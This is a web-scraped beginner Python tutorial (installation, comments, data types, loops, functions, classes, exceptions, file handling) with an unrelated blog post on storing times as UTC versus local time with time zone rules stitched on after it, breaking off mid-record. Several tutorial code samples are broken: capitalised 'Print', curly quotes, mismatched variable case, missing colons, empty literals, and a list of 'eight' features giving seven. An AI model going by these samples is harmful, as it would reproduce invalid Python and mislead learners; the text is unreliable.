creation python bindings for the Qt (C++ based) application development framework. The PySide library is the python binding of the cross-platform GUI toolkit Qt. Python compared to other languages If you know a few other languages, this section may be of interest to you. Here is a quick comparison of Python with other languages.. Perl Python and Perl come from a similar background basically Unix scripting. Perl emphasizes support for common application-oriented tasks, such as extracting information from a text file, report printing, text file conversions into other formats. Python emphasizes support for common programming methodologies such as data structure design and object-oriented programming and encourages programmers to write readable (and thus maintainable) code by providing an elegant syntax. Tcl Like Python, Tcl is used as an application extension language, as well as a stand-alone programming language. However, Tcl is weak on data structures and executes typical code much slower than Python. Tcl also lacks features needed for writing large programs hence a large application using Tcl usually contains extensions written in C or C++ that are specific to that application, and an equivalent application can often be written purely in Python language. Smalltalk Like Smalltalk, Python has dynamic typing and binding, and everything in Python is an object. Smalltalk's standard library of collection data types is more superior, while Python's library has more facilities for dealing with Internet and WWW realities such as email, HTML and FTP. Now, let’s see the nuts and bolts of Python How to install Python Python installation is pretty simple. You can install it on any operating system such as Windows, Mac OS X, Linux (Ubuntu) Installation of Python on Windows Goto. Click on Download Python 3.7.3 (you may see a different version number as it depends on the latest release) Once the file python3.7.3.exe is downloaded you can run the exe file to install Python. The installation includes IDLE, pip and the documentation. IDLE is an integrated development environment(IDE) for Python, which has been bundled with the default implementation of the language. IDLE is a graphical user interface (GUI) which has a number of features to develop your programs. Python can be installed on Linux/Unix, Mac OS X too. Click on: to install on Linux/Unix, Mac OS X and to install on other OS click on: some examples of other OS are AIX, IBM i, iOS, OS /390, z/OS, Solaris, VMS and HP-UX. You could also install Pycharm an IDE for Python developed by JetBrains, it claims to work better than any other IDE for Python. Pycharm helps developers to write neat and maintainable code, and it provides all the tools needed for productive Python development. You can download Pycharm for Linux/Unix, Mac OS X and Windows from:. Now that you have the required IDE setup, you can start writing your first program. If you are using Pycharm then follow the steps given below: - Click “Create New Project” in the PyCharm welcome screen. - Give a valid project name - Create a new python file, so right click on the folder name and select New -> Python File - Write the code: # this program prints Hello World on the screen Print(‘Hello World’) - Save the file as HelloWorld.py - Run the file HelloWorld.py - The output will be seen on the screen as - Hello World Your first Python program is ready. Now let us understand the fundamental features of the language. The Python Language – Feature set The Python language has 8 basic features that will help you write your own program applications in Python. - Keywords and Identifiers - Variables, Constants, and Literals - Data Types - Flow control - Functions - Classes and Objects - Exception Handling When we open any program written in a language, understanding the logic of the program is difficult. Comments are statements in any program which are not executed i.e. it does not alter the output result however they play a very important role as it improves the readability of the code. Comments should be written in plain English language for any user to read and understand. There are two ways in which you can comment in Python: Single line comment: as shown below # this line is a sample python comment. I am adding two numbers in the program below X = 6 Y = 10 Z = x + y Print(“”# Hello World”) print(z) However ‘#’ inside a program statement is not a comment. Output will be: # Hello World 16 Multiline comment For a multi-line comment in Python, you need to use triple single quotes at the beginning and at the end of the comment, as shown below. ‘’’ This is a sample multi Line comment Python will ignore these Lines. ‘’’ print(“Hello World”) Keywords and Identifiers Keywords are reserved words in the Python language. So, you cannot use keywords when you would like to name your variables, classes, functions and so on. These keywords define the language syntax, flow and structure. Below is the list of keywords in Python. Identifiers are names given to the variables, functions, and classes that you define. There are certain rules that you need to remember when you name identifiers. - Identifiers can be a combination of letters in lowercase (a to z) or uppercase (A to Z) or digits (0 to 9) or an underscore _. Names like displayNamesClass, intSalary_1, _myName all are valid identifiers. - An identifier cannot start with a digit. 1Salary is invalid, but Salary1 is valid. - Keywords mentioned above cannot be used as identifiers. - You cannot use special symbols such as !, @, #, $, % etc. while naming identifiers. - Python is a case-sensitive language hence employeeName and EMPLOYEEname are not the same. Variables, Constants and Literals Variables are used to store data which can be later used and changed in the program if needed. empName = “Jason” empNo = 19160 The = operator is used to assign a value to the variable print(empName) Will show the output as - Jason empName = “Susie” print(empName) Will show the output as - Susie Since Python is a dynamic typed language you do not have to worry about the data type of the variable when you declare it. When the code is executed the type of the variable will be identified based on the value in it. Constants are types of variables that cannot be changed. You could create a config.py file and store your constants in there. These can be used in your code wherever necessary. For example: config.py file will contain constants such as: COMPANYNAME=DATAINC COMPANYLOC=SAN FRANCISCO To use the config,py constants in your code you need to do the following import config # this is the config.py file that you have included in your program because you have to # access the constants which are in the file. print(config.COMPANYNAME) print(config.COMPANYLOC) When you run the program the output will be: DATAINC SAN FRANCISCO Literals are the data that is assigned to a variable or a constant. Python has the following literals. String, Numeric, Boolean, Special Literal called None and collection literals. Here is an example of a few types of literals. String: “Delhi” Numeric:100, -46.89 (float), 3.14j (3.14j is an imaginary literal which yields a complex number with a real part of 0.0. Complex numbers are represented as a pair of floating point numbers and have the same restrictions on their range. To create a complex number with a nonzero real part, add a floating point number to it) Boolean: True or False. A Boolean literal has only 2 values Data Types In Python data types are identified based on the values the variables contain. Python is an object-oriented language hence variables are considered as objects and data types are classes. Since Python is a dynamic-typed language you do not need to declare the variable with their type before using them. Some of the important data types are as follows: Numbers: int, float, and complex are data types that represent Numbers. a = 5 b = 8.77 c = 2+3j String: is a sequence of Unicode characters. You can use single quotes or double quotes to represent strings. Multi-line strings can be denoted using triple quotes, ''' or """. The data type of string in Python is – str S = “This is an example of a string” Boolean: If the value in a variable is either True or False, Python considers the data type of the variable as Boolean If (number % 2) = 0 noEven = True # noEven is of Boolean type else noEven = False List: List data type is an ordered sequence of values. All values in a list need not be of the same data type. Lists are changeable (mutable). The value in a list can be modified. Lists are used extensively. Tuple: Tuples are also similar to lists, they are an ordered sequence of values. The values in a tuple are not changeable (immutable). They are faster than lists as they do not change dynamically. Set: A set is an unordered and unindexed collection of items. The output of the set will show unique values. a = Dictionary: Dictionary is an unordered collection of key and value pairs. A dictionary is accessed by the keys. The keys can be of any data type. Sampledict = You can also convert one data type to the other and it is called type conversion. Flow Control - If, if …else, if …elif…else – Flow control is a part of decision making in programming. It helps you to run a particular piece of code only when a condition is satisfied. Here are some sample if conditions # Program checks if the number is positive or negative # And displays an appropriate message num = 3 if num >= 0: print("Positive or Zero") else: print("Negative number") You can extend the same program to include elif as follows # In this program, # we check if the number is positive or # negative or zero and # display an appropriate message num = 3.4 if num > 0: print("Positive number") elif num == 0: print("Zero") else: print("Negative number") You can use nested ifs i.e. you can have an - if...elif...else statement inside another if...elif...else statement. Loops - A loop is a sequence of instructions that is continually repeated until a condition is reached. There are three types of loops in Python. . for loop: Here is an example of a for loop # Program to print values stored in a list # List of numbers numbers = [6, 5, 3, 8, 4] # iterate over the list and print the values one by one for val in numbers: print(val) while loop: a while loop is similar to a for loop, however in a for loop you know the number of times you are going to iterate. A while loop executes as long as a condition holds true. This program prints all numbers from 1 to 9 num = 1 # loop will repeat itself as long as # num < 10 remains true while num < 10: print(num) #incrementing the value of num num = num + 1 break and continue are used in loops to alter the flow in the loop. A break is used to exit out of the loop for a particular condition hence it follows an if condition. A continue is used to skip a set of instructions and move on to the next iteration. Example of break and continue: # program to display only odd numbers for num in [20, 11, 9, 66, 4, 89, 44]: # Skipping the iteration when number is even if num%2 == 0: continue # This statement will be skipped for all even numbers print(num) # program to display all the elements before number 88 for num in [11, 9, 88, 10, 90, 3, 19]: print(num) if(num==88): print("The number 88 is found") print("Terminating the loop") break - Pass: An interesting feature in Python. ‘pass’ is a placeholder. If you would like to use a function, but you are not ready with the code for the function you can use ‘pass’. Here the Python interpreter does not ignore ‘pass’ however it assumes that it has to do nothing as of now. # pass is just a placeholder for # functionality to be added later. sequence = {'p', 'a', 's', 's'} for val in sequence: pass # do nothing as of now Functions A function is a sequence of steps or a block of code that performs a particular task. It usually accepts an input parameter, performs a process and returns a result. A function can be called from another function or from the main program. Functions are very important in coding. Advantages of using a function in a program are: - Improves readability of the code - Functions can be reused any number of times - The same Function can be used in any number of programs - It makes the code modular hence you could avoid errors There are two types of functions in Python: - Built-in functions: These functions are predefined in Python and you need to just use them. You do not have to define the function you just need to call the function wherever it is required. - User-defined functions: The functions that you create in your code for a specific process are user-defined functions. Sample function in Python: def multiply_nos(num1, num2) # this is the definition of your function with 2 input parameters return num1 * num2 # function returns the product of 2 numbers # now you are calling the function in your program product = multiply_nos(5,6) print(product) The output on the screen will show you the number 30 Class and Objects Python is an object-oriented programming language (OOP). Python satisfies the four principles of OOP encapsulation, abstraction, inheritance, and polymorphism. You can create classes, objects with attributes and methods. Class: A class is a blueprint of an object. You can imagine a class as a skeleton with certain attributes and methods. Attributes are the properties of the class and the methods are functions that are specific to the class. Object: When you create an instance of the class with specific features it is an object. The example here will help you understand it better. # this is a class class box: figuretype = “3D” # this is a class attribute def boxdimension(self, length, breadth, height) # these are instance attributes and boxdimension a class method print (length* breadth * height) #now you can create an instance of this class objsquare = box() # objsquare is an object objsquare.boxdimension(10,20,30) # you are passing these three numbers and the volume of # the box will be shown as the output Classes like functions are good to use as it enhances modularity and the code is reused. Classes can be used when you need to represent a collection of attributes and methods that will be used repeatedly in other places in your application. Exception Handling Errors detected during execution are called exceptions. Exceptions can be handled in Python. There are various types of exceptions that can be handled in your program. Few examples of exception are ValueError, KeyboardInterrupt, OSError, ZeroDivisionError and so on. Here is a sample code for exception handling def this_fails(): x = 1/0 try: this _fails() except ZeroDivisionError as err: print(‘Handling run time error error name is :’, err) The output of this program will look like this Handling run time error name is: division by zero You can define your own exceptions by creating a new exception class. Exceptions should typically be derived from the Exception class, either directly or indirectly. File Handling File handling is all about opening a file, reading, writing into it and closing a file. For example to open a text file you could do it with an in-built function ‘open’ in Python f = open("test.txt") # open file in current directory f = open("C:/Python33/README.txt") # specifying full path f.close() You can close a file using the close function. Files could be opened in various modes like read-only, write-only and so on. Python Doesn’t End Here! What you read through so far is only the tip of the iceberg. There is a lot more to Python programming. If you are keen to explore and learn further, you could get deep sights on Advanced Topics such as Python Iterators, Co-routines, Decorators, Generators and a lot more. You Might be Interested In: Thanks for sharing the valuable information about data science…..It was very helpful to me i read your blog this is very helpful for me, i also read this type of blog on IIP Academy.
https://hackr.io/blog/python-programming-language
CC-MAIN-2019-51
refinedweb
3,243
62.38
table of contents NAME¶ aio_return - get return status of asynchronous I/O operation SYNOPSIS¶ #include <aio.h> ssize_t aio_return(struct aiocb *aiocbp); Link with -lrt. DESCRIPTION¶. RETURN VALUE¶ If the asynchronous I/O operation has completed, this function returns the value that would have been returned in case of a synchronous read(2), write(2), fsync(2) or fdatasync(2), call. On error, -1 is returned, and errno is set appropriately. If the asynchronous I/O operation has not yet completed, the return value and effect of aio_return() are undefined. ERRORS¶ VERSIONS¶ The aio_return() function is available since glibc 2.1. ATTRIBUTES¶ For an explanation of the terms used in this section, see attributes(7). CONFORMING TO¶ POSIX.1-2001, POSIX.1-2008. EXAMPLES¶ SEE ALSO¶ aio_cancel(3), aio_error(3), aio_fsync(3), aio_read(3), aio_suspend(3), aio_write(3), lio_listio(3), aio(7) COLOPHON¶ This page is part of release 5.10 of the Linux man-pages project. A description of the project, information about reporting bugs, and the latest version of this page, can be found at.
https://manpages.debian.org/bullseye/manpages-dev/aio_return.3.en.html
CC-MAIN-2021-49
refinedweb
177
57.47
In this section, we are going to create the namespace using the JavaScript. In the given example, we have created two objects Util and Coll. By creating the objects for each namespace, we can add the functions as methods to these objects. Here we have added the functions add() and sub() to the Util object. And the functions mul() and div() to the Coll object. By using Util.add(), Util.sub(), Coll.mul() and Coll.div(), we can call the methods globally on the page as we have done here Here is the code: Output will be displayed as: On clicking the button, you will get the alert messages. namespace Post your Comment
http://roseindia.net/javascript/add-namespace.shtml
CC-MAIN-2016-22
refinedweb
113
84.57
There are many great tools available to create Ethereum Smart Contracts. It can be hard to choose between them. In this article, you will learn a simple workflow for developing Solidity smart contracts and calling their functions from C#. This workflow is well suited to .NET developers because it minimises the amount of new tools you need to know about. By using the excellent Nethereum .NET library you can continue to use the Visual Studio set of tools you are already familiar with. Imagine your goal is to take the contract called SimpleStorage.sol from the Solidity documentation and call its functions from a C# project. Your preference is to use Visual Studio where possible. This article is based on my own experiences working on the Nethereum project to integrate Ethereum with SAP Sales and Distribution business processes. Update Nov 2019: This workflow is well suited to situations where smart contracts are changing often (perhaps because you are developing them). When smart contracts are changing less often (perhaps because smart contracts are developed by another team) I have found I prefer the workflow detailed in section Alternative Workflow with VSCode at the end of this article. This is because like being able to explicitly control when regeneration happens. Both workflows use the same Nethereum code generation.. Workflow Overview There are many possible workflows to achieve your goal, and as new versions of tools and plugins are released other options will appear. At the time of writing this workflow was found to be simple and quick: The diagram above shows these steps: Write Solidity smart contracts and compile them in Visual Studio Code. The output of the compilation process are some files representing the ABI and bytecode for the contracts. Use the Nethereum Autogen code generator to automatically build C# API classes that provide access to the smart contracts. Use Visual Studio to write C# to call methods in the generated C# API classes. In this article the term functionrefers to a Solidity function and methodrefers to a C# method. Initial Setup Create Project In a command prompt, you will create a new .NET core console project that you’ll use to hold all your files: dotnet new sln --name DevWorkflowExample dotnet new console --name SimpleStorage dotnet sln add .\SimpleStorage\SimpleStorage.csproj cd SimpleStorage dotnet add package Nethereum.Web3 dotnet add package Nethereum.Autogen.ContractApi Prepare Visual Studio Code Open Visual Studio Code. Open extensions and install the Solidity extension here . Open the SimpleStorage folder we just created. You should see something like this: - If at any time, VS Code asks “Required assets to build and debug are missing from ‘SimpleStorage’. Add them?” say yes. - Create a new file (ctrl+N). - Paste the following solidity code into the file: pragma solidity >=0.4.0 <0.7.0; contract SimpleStorage { uint storedData; function set(uint x) public { storedData = x; } function get() public view returns (uint) { return storedData; } } - Save the file as SimpleStorage.solin the root of the SimpleStorage folder. The contract is from the Solidity documentation and you can see it is a very simple contract, just set()and get()functions. Now you are ready to begin the main developer workflow. The steps below correspond to the numbers on the diagram above. Main Developer Workflow Step 1 — Compile Smart Contract in Visual Studio Code In Visual Studio Code, press Shift-Ctrl-P and choose “Solidity: Compile Current Solidity Contract” or press F5. You should see some new files appearing in the SimpleStorage\bin folder, most importantly SimpleStorage.abi and SimpleStorage.bin . Step 2 — Rebuild the C# Project in Visual Studio Open the solution DevWorkflowExample.sln in Visual Studio (not Visual Studio Code). Right-click on the SimpleStorage project and choose “Rebuild”. The act of rebuilding the project triggers the Nethereum.Autogen.ContractApi package to build the C# API classes to let you interact with the SimpleStorage.sol contract. You should see a collection of new files added to the project in a folder called SimpleStorage like this: The generated SimpleStorageService class contains some useful methods: Notice the C# method naming is different for the set() and get() function calls. This is because set() changes a value on the blockchain, so it costs Ether, so it has be called using an Ethereum transaction, and will return a receipt. The get() function doesn't change any values on the blockchain, so it is a simple call and is free (no transaction and no receipt). Step 3 — Call Smart Contract functions from C# in Visual Studio Now you can call functions from your smart contract in the .NET core console program, by making calls to the generated C# classes mentioned in the previous section. For example, paste the code below into Program.cs, replacing everything that is currently there. using Nethereum.Web3; using Nethereum.Web3.Accounts; using SimpleStorage.SimpleStorage.CQS; using SimpleStorage.SimpleStorage.Service; using System; using System.Threading.Tasks; namespace SimpleStorage { class Program { static void Main(string[] args) { Demo().Wait(); } static async Task Demo() { try { // Setup // Here we're using local chain eg Geth); Console.WriteLine("Deploying..."); var deployment = new SimpleStorageDeployment(); var receipt = await SimpleStorageService.DeployContractAndWaitForReceiptAsync(web3, deployment); var service = new SimpleStorageService(web3, receipt.ContractAddress); Console.WriteLine($"Contract Deployment Tx Status: {receipt.Status.Value}"); Console.WriteLine($"Contract Address: {service.ContractHandler.ContractAddress}"); Console.WriteLine(""); Console.WriteLine("Sending a transaction to the function set()..."); var receiptForSetFunctionCall = await service.SetRequestAndWaitForReceiptAsync( new SetFunction() { X = 42, Gas = 400000 }); Console.WriteLine($"Finished storing an int: Tx Hash: {receiptForSetFunctionCall.TransactionHash}"); Console.WriteLine($"Finished storing an int: Tx Status: {receiptForSetFunctionCall.Status.Value}"); Console.WriteLine(""); Console.WriteLine("Calling the function get()..."); var intValueFromGetFunctionCall = await service.GetQueryAsync(); Console.WriteLine($"Int value: {intValueFromGetFunctionCall} (expecting value 42)"); Console.WriteLine(""); } catch (Exception ex) { Console.WriteLine(ex.ToString()); } Console.WriteLine("Finished"); Console.ReadLine(); } } } Build the project. The workflow is done! You can now make further edits to the smart contract in Visual Studio Code, compile it there, and simply rebuild the project in Visual Studio to be able to make C# calls to the amended Solidity functions. Program Execution Of course, you’d like to check that the program runs successfully. For the project to run, it needs to speak to a blockchain and here you do need a new tool. A good option during development is to run a local blockchain as described here: . With a local blockchain running, run the SimpleStorage console project from Visual Studio. You should get output like below: Contract Deployment Tx Status: 1 Contract Address: 0x243e72b69141f6af525a9a5fd939668ee9f2b354 Sending a transaction to the function set()... Finished storing an int: Tx Hash: 0xe4c8e72bf18c391c3dd0d18aa4c2ec4672591b974383f7d02120657d766d1bf3 Finished storing an int: Tx Status: 1 Calling the function get()... Int value: 42 (expecting value 42) Finished Where to go from here The next step in your development process would probably be to add some tests for your Solidity contract. Does this mean you absolutely have to go off and learn Truffle or some other tooling? The answer is no, you don’t. There is an example here of using XUnit test fixtures to launch a local chain before running tests to deploy contracts and call functions. Note, you don’t have to use the generated SimpleStorageService class to call your smart contract's functions. At the very least, though, it is instructive to see how the calls work in the generated code. Alternative Workflow with VSCode Update Nov 2019: As mentioned, the workflow detailed above I have found useful when the smart contracts are changing often and you want the C# classes to reflect these changes often. This suited the case where I was developing smart contracts and the C# at the same time. In cases where the smart contracts are stable (e.g. you have been sent ABI and bytecode by another development team) I have found I prefer to explicitly control when regeneration happens. This can be done by using VSCode not just to write the smart contracts but also to generate the necessary C# code. The workflow is well explained over on the Nethereum documentation site. Credits Thanks to Vijay055 from the Nethereum Gitter who posted some similar project code as a demo. Thanks to Juan Blanco who founded the Nethereum project, Dave Whiffin for the Autogen code generator package and Gael Blanchemain for reviewing and improving the article content.
https://kauri.io/a-.net-developer's-workflow-for-creating-and-calling-ethereum-smart-contracts/7df58e34248a4153b9a5f1b0c0eb54f3/a
CC-MAIN-2020-05
refinedweb
1,373
57.37
Just recently I spotted various I2C OLED displays on sale at reasonable prices and fancied trying to connect these up one of my Arduino’s. Being relatively small size, requiring only 2 connections SDA and SCL from the Arduino but still having good text and graphical capabilities I snapped a couple up cheaply on the net. Here is a picture of the OLED display I bought, these are common on many sites at the moment The first problem was connecting it up, this proved straightforward enough as the display can take standard 5v and GND and as its an I2C device on my Arduino UNO I hooked up A4 and A5 which are SDA and SCL respectively Connection Code Now finding a working library proved to be problematic, I tried various ones and no success, eventually I located the Multi LCD library and have mirrored it at the following link There are a few examples but here is a basic hello world that will show you how to display some text #include <Arduino.h> #include <Wire.h> #include <MicroLCD.h> //LCD_SH1106 lcd; /* for SH1106 OLED module */ LCD_SSD1306 lcd; /* for SSD1306 OLED module */ void setup() { lcd.begin(); } void loop() { lcd.clear(); lcd.setFontSize(FONT_SIZE_SMALL); lcd.println("Hello, world!"); lcd.setFontSize(FONT_SIZE_MEDIUM); lcd.println("Hello, world!"); delay(1000); } Links I2C 128X64 OLED LCD LED Display Module For Arduino on Amazon I2C OLED displays on Amazon UK 0.96″ 128×64 I2C Interface White Color OLED Display Module for Arduino / RPi / AVR / ARM / PIC
http://arduinolearning.com/learning/basics/connecting-i2c-oled-display.php
CC-MAIN-2022-27
refinedweb
251
53.55
Created on 2017-07-26 03:02 by madphysicist, last changed 2017-07-29 01:59 by terry.reedy. The docs for [`operator.index`][1] and `operator.__index__` state that > Return *a* converted to an integer. Equivalent to `a.__index__()`. The first sentence is correct, but the second is not. First of all, we have the data model [docs][2]: > For custom classes, implicit invocations of special methods are only guaranteed to work correctly if defined on an object’s type, not in the object’s instance dictionary. Secondly, we can make a simple counter-example in code: ``` import operator class A: def __index__(self): return 0 a = A() a.__index__ = (lambda self: 1).__get__(a, type(a)) operator.index(a) ``` The result is of course zero and not one. I believe that the docs should read something more like one of the following to avoid being misleading: > Return *a* converted to an integer, if it is already an integral type. > Return *a* converted to an integer. Equivalent to `type(a).__index__(a)`. Or a combination of both: > Return *a* converted to an integer, if it is already an integral type. Equivalent to `type(a).__index__(a)`. [1]: [2]: This seems like a generic issue for magic methods and is already covered by "for custom classes, implicit invocations of special methods are only guaranteed to work correctly if defined on an object’s type, not in the object’s instance dictionary." While you're technically correct with suggesting "Equivalent to `type(a).__index__(a)`", I don't think this is an improvement. It makes the docs safe against overly pedantic readings, but it also reduces the intelligibility for everyday users. The usual approach in the docs is to say "a[b] <==> a.__getitem__(b)" rather than "a[b] <==> type(a).__getitem__(a, b)". The latter is more correct but it is also less helpful. For the most part, this style of presentation has worked well for a lot of people for a long time. I recommend closing this or not doing any more than changing "Equivalent to:" to "Roughly equivalent to:".. I brought up the issue because it was really a point of confusion for me. Could we make the change to "Roughly equivalent" and make that a link to? That would make it clear how the lookup is actually done. While I agree that making the docs unnecessarily pedantic is probably a bad thing, I am going to guess that I am not the only person that looks to them for technical accuracy. Regards, -Joe On Thu, Jul 27, 2017 at 4:04 PM, R. David Murray <report@bugs.python.org> wrote: > > R. David Murray added the comment: > >. > > ---------- > nosy: +r.david.murray > > _______________________________________ > Python tracker <report@bugs.python.org> > <> > _______________________________________ > To me, 'roughly' is wrong. Either the equivalence is exact, or it is completely absent . There is no 'nearly' or 'roughly' about this situation. This is difference from iterator_class_x(args) being mathematically equivalent to generator_function_y(args) in the sense of yielding *exactly* the same sequence of objects, but being different in the Python sense that type(iterator_class_x) != type(generator_function_y). Note: even in this case, I was once in favor of changing 'equivalent' to 'roughly equivalent' in the itertools doc. I now regret that because 'roughly' could be misunderstood. I think that 'mathematically equivalent' or 'equivalent when iterated' or 'equivalent*' would be better, with an explanatory note at the top. As for this issue, __index__ is a reserved name. a.__index__ = <whatever> is an unauthorized use of a *reserved* word and the effect of such usage is not and need not be documented. The entry for __*__ does include "*Any* use of __*__ names, in any context, that does not follow explicitly documented use, is subject to breakage without warning." To me, that says that the effect of the reserved-word assignment is undefined. It could be made to raise an exception. To be even clearer, I believe we should explicitly state what I consider implicit: something like "Any such use breaks these manuals, in the sense that it may make statements herein untrue. These manuals assume that reserved names are used as specified."
https://bugs.python.org/issue31042
CC-MAIN-2020-05
refinedweb
696
57.98
Note: this is a pretty long post. If you’re not interested in the details, the conclusion at the bottom is intended to be read in a standalone fashion. There’s also a related blog post by Lau Taarnskov – if you find this one difficult to read for whatever reason, maybe give that a try.. This blog post is intended to provide a counterpoint to that advice. I’m certainly not saying storing UTC is always the wrong thing to do, but it’s not always the right thing to do either. Note on simplifications: this blog post does not go into supporting non-Gregorian calendar systems, or leap seconds. Hopefully developers writing applications which need to support either of those are already aware of their requirements. Background: EU time zone rule changes The timing of this blog post is due to recent European Parliament proceedings that look like they will probably end the clocks changing twice a year into “summer time” or “winter time” within EU member states. The precise details are yet to be finalized and are unimportant to the bigger point, but for the purpose of this blog post I’ll assume that each member state has to decide whether they will “spring forward” one last time on March 28th 2021, then staying in permanent “summer time”, or “fall back” one last time on October 31st 2021, then staying in permanent “winter time”. So from November 1st 2021 onwards, the UTC offset of each country will be fixed – but there may be countries which currently always have the same offset as each other, and will have different offsets from some point in 2021. (For example, France could use winter time and Germany could use summer time.) The larger point is that time zone rules change, and that applications should expect that they will change. This isn’t a corner case, it’s the normal way things work. There are usually multiple sets of rule changes (as released by IANA) each year. At least in the European changes, we’re likely to have a long notice period. That often isn’t the case – sometimes we don’t find out about rule changes until a few days before they happen. Application example For the sake of making everything concrete, I’m going to imagine that we’re writing an application to help conference organizers. A conference organizer can create a conference within the application, specifying when and where it’s happening, and (amongst other things) the application will display a countdown timer of “the number of hours left before the start of the conference”. Obviously a real application would have a lot more going on than this, but that’s enough to examine the implementation options available. To get even more concrete, we’ll assume that a conference organizer has registered a conference called “KindConf” and has said that it will start at 9am in Amsterdam, on July 10th 2022. They perform this registration on March 27th 2019, when the most recently published IANA time zone database is 2019a, which predicts that the offset observed in Amsterdam on July 10th 2022 will be UTC+2. For the sake of this example, we’ll assume that the Netherlands decides to fall back on October 31st 2021 for one final time, leaving them on a permanent offset of UTC+1. Just to complete the picture, we’ll assume that this decision is taken on February 1st 2020, and that IANA publishes the changes on March 14th 2020, as part of release 2020c. So, what can the application developer do? In all the options below, I have not gone into details of the database support for different date/time types. This is important, of course, but probably deserves a separate blog post in its own right, on a per-database basis. I’ll just assume we can represent the information we want to represent, somehow. Interlude: requirements Before we get to the implementations, I’ll just mention a topic that’s been brought up a few times in the comments and on Twitter. I’ve been assuming that the conference does still occur at 9am on July 10th 2022… in other words, that the “instant in time at which the conference starts” changes when the rules change. It’s unlikely that this would ever show up in a requirements document. I don’t remember ever being in a meeting with a product manager where they’d done this type of contingency planning. If you’re lucky, someone would work out that there’s going to be a problem long before the rules actually change. At that point, you’d need to go through the requirements and do the implementation work. I’d argue that this isn’t a new requirement – it’s a sort of latent, undiscovered requirement you’ve always had, but you hadn’t known about before. Now, back to the options… Option 1: convert to UTC and just use that forever The schema for the Conferences table in the database might look like this: - ID: auto-incremented integer - Name: string - Start: date/time in UTC - Address: string The entry for KindConf would look like this: - ID: 1 - Name: KindConf - Start: 2022-07-10T07:00:00Z - Address: Europaplein 24, 1078 GZ Amsterdam, Netherlands That entry is then preserved forever, without change. So what happens to our countdown timer? Result The good news is that anyone observing the timer will see it smoothly count down towards 0, with no jumps. The bad news is that when it reaches 0, the conference won’t actually start – there’ll be another hour left. This is not good. Option 2: convert to UTC immediately, but reconvert after rule changes The schema for the Conferences table would preserve the time zone ID. (I’m using the IANA ID for simplicity, but it could be the Windows system time zone ID, if absolutely necessary.) Alternatively, the time zone ID could be derived each time it’s required – more on that later. - ID: auto-incremented integer - Name: string - Start: date/time in UTC - Address: string - Time zone ID: string The initial entry for KindConf would look like this: - ID: 1 - Name: KindConf - Start: 2022-07-10T07:00:00Z - Address: Europaplein 24, 1078 GZ Amsterdam, Netherlands - TimeZoneId: Europe/Amsterdam On March 14th 2020, when the new time zone database is released, that entry could be changed to make the start time accurate again: - ID: 1 - Name: KindConf - Start: 2022-07-10T08:00:00Z - Address: Europaplein 24, 1078 GZ Amsterdam, Netherlands - TimeZoneId: Europe/Amsterdam But what does that “change” procedure look like? We need to convert the UTC value back to the local time, and then convert back to UTC using different rules. So which rules were in force when that entry was created? It looks like we actually need an extra field in the schema somewhere: TimeZoneRulesVersion. This could potentially be a database-wide value, although that’s only going to be reasonable if you can update all entries and that value atomically. Allowing a value per entry (even if you usually expect all entries to be updated at roughly the same time) is likely to make things simpler. So our original entry was actually: - ID: 1 - Name: KindConf - Start: 2022-07-10T07:00:00Z - Address: Europaplein 24, 1078 GZ Amsterdam, Netherlands - TimeZoneId: Europe/Amsterdam - TimeZoneRules: 2019a And the modified entry is: - ID: 1 - Name: KindConf - Start: 2022-07-10T08:00:00Z - Address: Europaplein 24, 1078 GZ Amsterdam, Netherlands - TimeZoneId: Europe/Amsterdam - TimeZoneRules: 2020c Of course, the entry could have been updated many times over the course of time, for 2019b, 2019c, …, 2020a, 2020b. Or maybe we only actually update the entry if the start time changes. Either way works. Result. Implementation Let’s look at roughly what would be needed to perform this update in C# code. I’ll assume the use of Noda Time to start with, but then we’ll consider what happens if you’re not using Noda Time. public class Conference { public int Id { get; set; } public string Name { get; set; } public string Address { get; set; } public Instant Start { get; set; } public string TimeZoneId { get; set; } public string TimeZoneRules { get; set; } } // In other code... some parameters might be fields in the class. public void UpdateStartTime( Conference conference, Dictionary<string, IDateTimeZoneProvider> timeZoneProvidersByVersion, string latestRules) { // Map the start instant into the time zone using the old rules IDateTimeZoneProvider oldProvider = timeZoneProvidersByVersion[conference.TimeZoneRules]; DateTimeZone oldZone = oldProvider[conference.TimeZoneId]; ZonedDateTime oldZonedStart = conference.Start.InZone(oldZone); IDateTimeZoneProvider newProvider = timeZoneProvidersByVersion[latestRules]; DateTimeZone newZone = newProvider[conference.TimeZoneId]; // Preserve the local time, but with the new time zone rules ZonedDateTime newZonedStart = oldZonedStart.LocalDateTime.InZoneLeniently(newZone); // Update the conference entry with the new information conference.Start = newZonedStart.ToInstant(); conference.TimeZoneRules = latestRules; } The InZoneLeniently call is going to be a common issue – we’ll look at that later (“Ambiguous and skipped times”). This code would work, and Noda Time would make it reasonably straightforward to build that dictionary of time zone providers, as we publish all the “NZD files” we’ve ever created from 2013 onwards on the project web site. If the code is being updated with the latest stable version of the NodaTime NuGet package, the latestRules parameter wouldn’t be required – DateTimeZoneProviders.Tzdb could be used instead. (And IDateTimeZoneProvider.VersionId could obtain the current version.) However, this approach has three important requirements: - The concept of “version of time zone rules” has to be available to you - You have to be able to load a specific version of the time zone rules - You have to be able to use multiple versions of the time zone rules in the same application If you’re using C# but relying on TimeZoneInfo then… good luck with any of those three. (It’s no doubt feasible, but far from simple out of the box, and it may require an external service providing historical data.) I can’t easily comment on other platforms in any useful way, but I suspect that dealing with multiple versions of time zone data is not something that most developers come across. Option 3: preserve local time, using UTC as derived data to be recomputed Spoiler alert: this is my preferred option. In this approach, the information that the conference organizer supplied (“9am on July 10th 2022”) is preserved and never changed. There is additional information in the entry that is changed when the time zone database is updated: the converted UTC instant. We can also preserve the version of the time zone rules used for that computation, as a way of allowing the process of updating entries to be restarted after a failure without starting from scratch, but it’s not strictly required. (It’s also probably useful as diagnostic information, too.) The UTC instant is only stored at all for convenience. Having a UTC representation makes it easier to provide total orderings of when things happen, and also to compute the time between “right now” and the given instant, for the countdown timer. Unless it’s actually useful to you, you could easily omit it entirely. (My Noda Time benchmarks suggest it’s unlikely that doing the conversion on every request wouldn’t cause a bottleneck. A single local-to-UTC conversion on my not-terribly-fast benchmark machine only takes ~150ns. In most environments that’s close to noise. But for cases where it’s relevant, it’s fine to store the UTC as described below.) So the schema would have: - ID: auto-incremented integer - Name: string - Local start: date/time in the specified time zone - Address: string - Time zone ID: string - UTC start: derived field for convenience - Time zone rules version: for optimization purposes So our original entry is: - ID: 1 - Name: KindConf - LocalStart: 2022-07-10T09:00:00 - Address: Europaplein 24, 1078 GZ Amsterdam, Netherlands - TimeZoneId: Europe/Amsterdam - UtcStart: 2022-07-10T07:00:00Z - 